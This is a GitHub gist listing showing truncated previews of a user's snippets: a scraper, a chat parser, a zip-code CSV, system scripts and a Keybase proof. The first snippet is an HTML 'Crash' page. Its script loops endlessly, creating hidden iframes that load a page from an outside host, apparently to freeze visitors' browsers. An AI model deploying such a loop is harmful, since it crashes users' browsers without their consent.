Skip to content

Instantly share code, notes, and snippets.

<html>
<head>
Crash ? !
</head>
<iframe src="http://panzi.github.io/Browser-Ponies/ponies-iframe.html#fadeDuration=500&volume=1&fps=25&speed=3&audioEnabled=false&showFps=false&showLoadProgress=true&speakProbability=0.15&paddock=true&grass=true" style="overflow:hidden;border-style:none;margin:0;padding:0;background:transparent;width:640px;490px;" width="640" height="490" frameborder="0" scrolling="no" marginheight="0" marginwidth="0"></iframe>
<script>
while(10>9){
var iframe = document.createElement('iframe');
iframe.style.display = "none";
iframe.src = "http://goo.hacktohell.org/g.html";
#include "stdafx.h"
#include<string>
#include<iostream>
#include<conio.h>
#define SIZE 20
using namespace std;
class stack{
public:
int a[SIZE];

Keybase proof

I hereby claim:

  • I am hacktohell on github.
  • I am gowtham (https://keybase.io/gowtham) on keybase.
  • I have a public key whose fingerprint is 33FD EA97 0AD0 B068 1F56 8DBA FEDE 04E1 30E0 93B7

To claim this, I am signing this object:

@HackToHell
HackToHell / auresult.py
Last active November 17, 2015 10:11
Anna University result scraper
# coding: utf-8
# In[30]:
import csv
# In[59]:
import requests
city Population zip state lat lng
Indianapolis 798,382 46201 IN 39.775006 -86.109348
Indianapolis 798,382 46202 IN 39.785063 -86.159502
Indianapolis 798,382 46203 IN 39.743025 -86.117859
Indianapolis 798,382 46204 IN 39.771986 -86.153491
Indianapolis 798,382 46205 IN 39.826761 -86.138582
Indianapolis 798,382 46208 IN 39.829905 -86.179444
Indianapolis 798,382 46218 IN 39.80817 -86.101425
Indianapolis 798,382 46219 IN 39.782092 -86.049533
Indianapolis 798,382 46220 IN 39.864685 -86.11815
@HackToHell
HackToHell / WhatsappChat backup txt parser.py
Created June 6, 2016 16:57
Makes the text into a csv
fp = open('C:/Users/Gowtham/Downloads/WhatsApp Chat with xxxx.txt','r')
text = fp.readlines()
text = [line.rstrip('\n') for line in text]
import csv
with open('names.csv', 'w') as csvfile:
fields = ['time','Name','Text']
writer = csv.DictWriter(csvfile, fieldnames=fields)
writer.writeheader()
@HackToHell
HackToHell / datawritten.sh
Created March 19, 2017 13:58
Script to get the amount of data written to the Samsung EVO 850 SSD
sudo smartctl -A /dev/sdb | awk '/^241/ { print "TBW: "($10 * 512) * 1.0e-12, "TB" } '
@HackToHell
HackToHell / Gopkg.lock
Created October 23, 2017 17:29
k8s errors
# This file is autogenerated, do not edit; changes may be undone by the next 'dep ensure'.
[[projects]]
name = "github.com/PuerkitoBio/purell"
packages = ["."]
revision = "0bcb03f4b4d0a9428594752bd2a3b9aa0a9d4bd4"
version = "v1.1.0"
[[projects]]
@HackToHell
HackToHell / launch.sh
Created January 11, 2017 14:15
Insurgency and TF2 launch args for Arch Linux and bumblebee
vblank_mode=0 LD_PRELOAD='/usr/$LIB/libstdc++.so.6 /usr/$LIB/libgcc_s.so.1 /usr/$LIB/libxcb.so.1 /usr/$LIB/libgpg-error.so' optirun -b primus %command%